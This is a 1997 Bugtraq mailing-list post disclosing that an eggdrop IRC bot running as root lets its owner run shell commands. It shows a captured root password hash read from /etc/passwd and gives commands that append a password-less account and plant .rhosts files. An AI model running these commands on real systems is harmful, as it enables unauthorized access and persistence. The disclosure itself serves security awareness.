Bugtraq mailing list archives
Having fun with eggdrop bot
From: cocaine () ROCKETMAIL COM (Giuliano COCAINE)
Date: Thu, 28 Aug 1997 21:47:36 -0700
Eggdrops bots can access files all over the system if you're owner and the bot runs with root permissions. You can get the passwd when you're the owner of the bot, and also modify it if the bot is running with the root permissions. Tested in an Eggdrop bot 1.0p <DiE4YoU> .tcl exec cat /etc/passwd [1:21] <lamebot> Tcl: root:zWCF/X7irjQ4E:0:0:root:/:/bin/bash [1:21] <lamebot> Tcl: bin:*:1:1:bin:/bin: [1:21] <lamebot> Tcl: daemon:*:2:2:daemon:/sbin: [1:21] <lamebot> Tcl: adm:*:3:4:adm:/var/adm: [1:21] <lamebot> Tcl: lp:*:4:7:lp:/var/spool/lpd: [1:21] <lamebot> Tcl: sync:*:5:0:sync:/sbin:/bin/sync you can also try .tcl exec echo "stupid::394:100:/:/bin/bash" >> /etc/passwd and telet to the host of the bot you can try to make .rhosts and all shit you may think. Think 'bout that ;) Giuliano Mendez _____________________________________________________________________ Sent by RocketMail. Get your free e-mail at http://www.rocketmail.com
Current thread:
- Re: syslogd fun (erratum) Yuri Volobuev (Aug 28)
- Having fun with eggdrop bot Giuliano COCAINE (Aug 28)
- Re: Having fun with eggdrop bot The Nolander (Aug 29)
- Re: Having fun with eggdrop bot -*- Chotaire -*- (Aug 29)
- DDB/securelevel Aleph One (Aug 30)
- Re: DDB/securelevel Andrew Brown (Aug 30)
- Mac TCP/IP Stack glitch. nomad () APOLLO TOMCO NET (Aug 31)
- Re: Having fun with eggdrop bot The Nolander (Aug 29)
- Having fun with eggdrop bot Giuliano COCAINE (Aug 28)
- Re: syslogd fun (erratum) Theo de Raadt (Aug 28)
- SGI security patches Martin J. Dellwo (Aug 29)
- Somewhat of a security hole in CVS Elliot Lee (Aug 29)
- Re: Somewhat of a security hole in CVS Theo de Raadt (Aug 29)
- Re: Somewhat of a security hole in CVS Marc Slemko (Aug 29)